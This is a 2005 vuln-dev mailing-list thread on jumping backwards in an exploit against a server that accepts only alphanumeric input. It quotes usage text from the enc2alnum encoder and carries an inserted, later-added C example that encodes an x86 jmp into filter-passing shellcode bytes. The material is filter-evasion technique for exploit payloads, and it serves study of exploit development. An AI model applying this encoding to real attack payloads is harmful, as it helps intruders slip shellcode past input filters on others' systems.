Vulnerability Development mailing list archives

Re: AlphaNumeric Exploitation Help


From: <6d79676d61696c6163636f756e74 () gmail com>
Date: 26 May 2005 20:16:28 -0000

In-Reply-To: <20050526113825.537.qmail () www securityfocus com>

read this:
http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html
=======================
#include <stdio.h>

#ifndef ENC2ALNUM_COPYRIGHT
/* Banner string defined elsewhere in the enc2alnum source; empty here so the fragment compiles on its own. */
#define ENC2ALNUM_COPYRIGHT ""
#endif

/* Printed when input_reg (the operand that tells the encoder where the shellcode lives) is not recognised. */
void Encode2AlnumUsage(void)
{
        fprintf(stderr, ENC2ALNUM_COPYRIGHT);
        fprintf(stderr, "ERROR in Encode2Alnum (invalid input_reg)\n\n");
        fprintf(stderr, "input_reg must be one of the following:\n");
        fprintf(stderr, " reg = the register points to the shellcode\n");
        fprintf(stderr, "\tSupported registers are eax, ebx, ecx, edx, esi, edi, ebp, esp\n");
        fprintf(stderr, " [reg] = reg points to a pointer to the shellcode\n");
        fprintf(stderr, "\tSupported registers are the same as above\n");
        fprintf(stderr, " reg+X\n");
        fprintf(stderr, " reg-x\n");
        fprintf(stderr, " [reg+X]\n");
        fprintf(stderr, " [reg-x]\n\n\n");
        fprintf(stderr, "\tenc2alnum [eax]\n");
        fprintf(stderr, "Example - Assumes ecx-8 is the shellcode address:\n");
        fprintf(stderr, "\tenc2alnum ecx-8\n");
}
================
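The linked tool does two jobs: it turns the raw payload into bytes that pass the [0-9A-Za-z] filter, and it prepends an (itself alphanumeric) decoder stub that rebuilds the raw bytes in place, which is why it has to be told which register points at the shellcode. What follows is an added example of the first job only; it is not code from this thread or from Encode2Alnum. It assumes a decoder that recovers each payload byte as ((x & 0x0F) << 4) ^ y from two alphanumeric bytes x,y (a scheme in the style of SkyLined's ALPHA2, picked for illustration; the page does not show Encode2Alnum's own scheme), and it assumes "JMP -600" means the target is 600 bytes before the start of the 5-byte E9 rel32 instruction, so the displacement is -(600 + 5). It runs on the host and executes nothing.

```c
/* Added example, not from this thread or from Encode2Alnum.
 * Assumed decoder scheme: payload byte b is carried as two alphanumeric
 * bytes x,y with  b == ((x & 0x0F) << 4) ^ y.  The shift is essential: a
 * plain XOR of two alphanumeric bytes can never set bit 7, because no
 * alphanumeric high nibble (3..7) has that bit set.
 * Assumed jump semantics: target is `back` bytes before the jmp itself,
 * and rel32 counts from the end of the 5-byte instruction. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The filter as the vulnerable server is described: [0-9A-Za-z] only. */
static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}

/* 1 if every byte in buf would survive the filter. */
int all_alnum(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!is_alnum_byte(buf[i]))
            return 0;
    return 1;
}

/* An alphanumeric byte whose low nibble is nib (0..15): '0'..'9' cover
 * 0..9 and 'A'..'O' cover 1..15, so every nibble has one. */
static uint8_t alnum_with_low_nibble(uint8_t nib)
{
    for (uint8_t hi = 0x3; hi <= 0x7; hi++) {
        uint8_t c = (uint8_t)((hi << 4) | (nib & 0x0F));
        if (is_alnum_byte(c))
            return c;
    }
    abort(); /* unreachable, see comment above */
}

/* Encode n raw bytes into 2*n alphanumeric bytes (out needs 2*n). */
void alnum_encode(const uint8_t *in, size_t n, uint8_t *out)
{
    for (size_t i = 0; i < n; i++) {
        uint8_t b = in[i];
        uint8_t y = alnum_with_low_nibble(b & 0x0F);            /* carries b's low nibble */
        uint8_t x = alnum_with_low_nibble((b >> 4) ^ (y >> 4)); /* cancels y's high nibble */
        out[2 * i] = x;
        out[2 * i + 1] = y;
    }
}

/* What the decoder stub computes in place at run time, modelled on the host. */
void alnum_decode(const uint8_t *in, size_t n_pairs, uint8_t *out)
{
    for (size_t i = 0; i < n_pairs; i++)
        out[i] = (uint8_t)(((in[2 * i] & 0x0F) << 4) ^ in[2 * i + 1]);
}

/* rel32 for a jmp whose target is `back` bytes before the jmp itself. */
int32_t jmp_back_disp(uint32_t back)
{
    return -(int32_t)(back + 5);
}

/* Emit E9 rel32 (little-endian) for that jump; always 5 bytes. */
size_t make_jmp_back(uint32_t back, uint8_t out[5])
{
    uint32_t d = (uint32_t)jmp_back_disp(back);
    out[0] = 0xE9;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(d >> (8 * i));
    return 5;
}

/* One jump end to end: the raw jmp fails the filter, its encoding passes,
 * equals `expected` (10 chars), and decodes back to the raw bytes. */
int encoded_jmp_back_matches(uint32_t back, const char *expected)
{
    uint8_t raw[5], enc[10], dec[5];
    make_jmp_back(back, raw);
    alnum_encode(raw, 5, enc);
    alnum_decode(enc, 5, dec);
    return !all_alnum(raw, 5) && all_alnum(enc, 10)
        && strlen(expected) == 10 && memcmp(enc, expected, 10) == 0
        && memcmp(dec, raw, 5) == 0;
}

/* Every one of the 256 byte values must survive an encode/decode round trip. */
int roundtrip_all_bytes(void)
{
    for (int b = 0; b < 256; b++) {
        uint8_t in = (uint8_t)b, enc[2], out;
        alnum_encode(&in, 1, enc);
        alnum_decode(enc, 1, &out);
        if (!all_alnum(enc, 2) || out != in)
            return 0;
    }
    return 1;
}

int main(void)
{
    uint8_t raw[5], enc[10];
    make_jmp_back(600, raw);
    alnum_encode(raw, 5, enc);
    printf("jmp -600 raw:   ");
    for (int i = 0; i < 5; i++)
        printf("%02x ", raw[i]);
    printf("\nalnum encoded:  %.10s\n", (const char *)enc);
    return roundtrip_all_bytes() ? 0 : 1;
}
```

For the jump in the question this yields E9 A3 FD FF FF, which the filter rejects, and the ten-character string "M993KMKOKO", which it accepts. The decoder stub is the part this example leaves out: in tools of this kind it walks the encoded pairs relative to the register named on the command line (hence the reg / [reg] / reg+X forms in the usage text), writes each decoded byte back over the buffer, and the rebuilt jmp runs once decoding reaches it. The stub must itself be alphanumeric, so a wrong register choice means it decodes the wrong memory and the payload never appears.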

Date: 26 May 2005 11:38:25 -0000
Message-ID: <20050526113825.537.qmail () www securityfocus com>
From: <ramatkal () hotmail com>
To: vuln-dev () securityfocus com
Subject: AlphaNumeric Exploitation Help



I am trying to exploit a vulnerable server which only allows
alphanumeric characters.

I have successfully taken control of EIP and now need to do a JUMP -600
bytes.

The problem is that 'eb' and 'e9' are not alphanumeric ASCII codes and
thus cannot be used to do the jumps in the payload.

Anyone got any ideas/tricks/advice on how I can accomplish a JMP -600 bytes,
or any type of jump for that matter, only using alphanumeric chars?

Thanks,
RaMatkal


